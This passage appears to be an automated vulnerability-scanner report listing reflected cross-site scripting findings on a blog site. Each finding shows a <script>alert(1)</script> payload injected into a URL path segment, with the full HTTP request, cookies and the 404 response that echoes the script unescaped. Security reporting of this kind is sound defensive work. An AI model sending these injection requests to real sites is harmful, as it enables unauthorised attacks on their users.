Content-Length: 352
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/new-jersey97d30<script>alert(1)</script>d935da65367/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f622<script>alert(1)</script>04772bbc023 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora7f622<script>alert(1)</script>04772bbc023/archives/new-york/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 350
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora7f622<script>alert(1)</script>04772bbc023/archives/new-york/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 33fe0<script>alert(1)</script>cbd4cc45e8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives33fe0<script>alert(1)</script>cbd4cc45e8c/new-york/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:36 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives33fe0<script>alert(1)</script>cbd4cc45e8c/new-york/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3aeb2<script>alert(1)</script>3e9b7737a01 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/new-york3aeb2<script>alert(1)</script>3e9b7737a01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:40 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/new-york3aeb2<script>alert(1)</script>3e9b7737a01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ad877<script>alert(1)</script>2e63fd05877 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraad877<script>alert(1)</script>2e63fd05877/archives/north-carolina/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraad877<script>alert(1)</script>2e63fd05877/archives/north-carolina/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5bf6f<script>alert(1)</script>8d5991e8eea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5bf6f<script>alert(1)</script>8d5991e8eea/north-carolina/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5bf6f<script>alert(1)</script>8d5991e8eea/north-carolina/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 31bd3<script>alert(1)</script>2c5162fd032 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/north-carolina31bd3<script>alert(1)</script>2c5162fd032/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/north-carolina31bd3<script>alert(1)</script>2c5162fd032/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b2610<script>alert(1)</script>d78d8cd256a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorab2610<script>alert(1)</script>d78d8cd256a/archives/north-dakota/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorab2610<script>alert(1)</script>d78d8cd256a/archives/north-dakota/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5acb9<script>alert(1)</script>15a4ca42e12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5acb9<script>alert(1)</script>15a4ca42e12/north-dakota/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5acb9<script>alert(1)</script>15a4ca42e12/north-dakota/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e83f5<script>alert(1)</script>eae0ddbe282 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/north-dakotae83f5<script>alert(1)</script>eae0ddbe282/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/north-dakotae83f5<script>alert(1)</script>eae0ddbe282/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f0dd2<script>alert(1)</script>e2bfea7bc51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraf0dd2<script>alert(1)</script>e2bfea7bc51/archives/ohio/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 346
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraf0dd2<script>alert(1)</script>e2bfea7bc51/archives/ohio/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 79fc4<script>alert(1)</script>3aa6b3a6382 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives79fc4<script>alert(1)</script>3aa6b3a6382/ohio/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 346
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives79fc4<script>alert(1)</script>3aa6b3a6382/ohio/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 16703<script>alert(1)</script>25633d7f8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/ohio16703<script>alert(1)</script>25633d7f8/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 344
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/ohio16703<script>alert(1)</script>25633d7f8/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a724b<script>alert(1)</script>15c03653159 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraa724b<script>alert(1)</script>15c03653159/archives/oregon/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraa724b<script>alert(1)</script>15c03653159/archives/oregon/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 39f53<script>alert(1)</script>f58171d63c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives39f53<script>alert(1)</script>f58171d63c4/oregon/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives39f53<script>alert(1)</script>f58171d63c4/oregon/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 88507<script>alert(1)</script>bba21d90949 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/oregon88507<script>alert(1)</script>bba21d90949/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/oregon88507<script>alert(1)</script>bba21d90949/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e4fb4<script>alert(1)</script>426d5c520e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorae4fb4<script>alert(1)</script>426d5c520e/archives/other-states/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 353
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorae4fb4<script>alert(1)</script>426d5c520e/archives/other-states/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8f143<script>alert(1)</script>15a8d762de1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives8f143<script>alert(1)</script>15a8d762de1/other-states/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives8f143<script>alert(1)</script>15a8d762de1/other-states/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 27558<script>alert(1)</script>268c97fcc9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/other-states27558<script>alert(1)</script>268c97fcc9d/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/other-states27558<script>alert(1)</script>268c97fcc9d/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4116e<script>alert(1)</script>e1dd3c30265 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4116e<script>alert(1)</script>e1dd3c30265/archives/other_states/index.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:40 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 364
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora4116e<script>alert(1)</script>e1dd3c30265/archives/other_states/index.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bbc81<script>alert(1)</script>8bbad4a334b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbbc81<script>alert(1)</script>8bbad4a334b/other_states/index.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
